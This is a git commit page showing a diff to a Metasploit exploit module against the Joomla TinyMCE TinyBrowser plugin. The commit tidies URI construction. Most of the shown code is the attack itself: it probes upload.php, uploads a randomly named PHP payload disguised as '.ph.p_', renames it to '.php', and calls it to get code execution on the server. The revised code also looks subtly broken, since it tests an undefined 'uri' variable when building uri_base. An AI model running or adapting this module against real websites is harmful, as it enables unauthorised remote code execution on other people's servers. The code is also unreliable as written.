clean up extra slashes in uris
git-svn-id: file:///home/svn/framework3/trunk@9036 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
4e23992588
commit
78d1338171
|
@ -57,9 +57,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
uri = ''
|
||||
uri << datastore['URI']
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => datastore['URI'] + '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
|
||||
'uri' => uri
|
||||
}, 25)
|
||||
|
||||
if (res and res.body =~ /flexupload.swf/)
|
||||
|
@ -81,17 +85,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Generate some random strings
|
||||
cmdscript = rand_text_alpha_lower(20)
|
||||
boundary = rand_text_alphanumeric(6)
|
||||
boundary = rand_text_alphanumeric(6)
|
||||
|
||||
# Static files
|
||||
directory = '/images/stories/'
|
||||
tinybrowserpath = '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/'
|
||||
cmdpath = directory + cmdscript
|
||||
uri_base = ''
|
||||
uri_base << datastore['URI']
|
||||
uri_base << '/' if uri[-1,1] != '/'
|
||||
uri_base << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser'
|
||||
|
||||
# Get obfuscation code (needed to upload files)
|
||||
obfuscation_code = nil
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='
|
||||
'uri' => uri_base + '/upload.php?type=file&folder='
|
||||
}, 25)
|
||||
|
||||
if (res)
|
||||
|
@ -116,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
data << "\r\n--#{boundary}--"
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + tinybrowserpath + "/upload_file.php?folder=/images/stories/&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
|
||||
'uri' => uri_base + "/upload_file.php?folder=" + directory + "&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>
|
||||
|
@ -136,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Complete the upload process (rename file)
|
||||
print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + tinybrowserpath + 'upload_process.php?folder=/images/stories/&type=file&feid=&filetotal=1'
|
||||
'uri' => uri_base + '/upload_process.php?folder=' + directory + '&type=file&feid=&filetotal=1'
|
||||
})
|
||||
|
||||
|
||||
|
@ -144,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['URI'] + tinybrowserpath + '/edit.php?type=file&folder=',
|
||||
'uri' => uri_base + '/edit.php?type=file&folder=',
|
||||
'vars_post' =>
|
||||
{
|
||||
'actionfile[0]' => "#{cmdscript}.ph.p",
|
||||
|
@ -167,8 +174,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Finally call the payload
|
||||
print_status("Calling payload: #{cmdscript}.php")
|
||||
uri = ''
|
||||
uri << datastore['URI']
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri << directory + cmdscript + ".php"
|
||||
res = send_request_raw({
|
||||
'uri' => "#{datastore['URI'] }images/stories/#{cmdscript}.php"
|
||||
'uri' => uri
|
||||
}, 25)
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue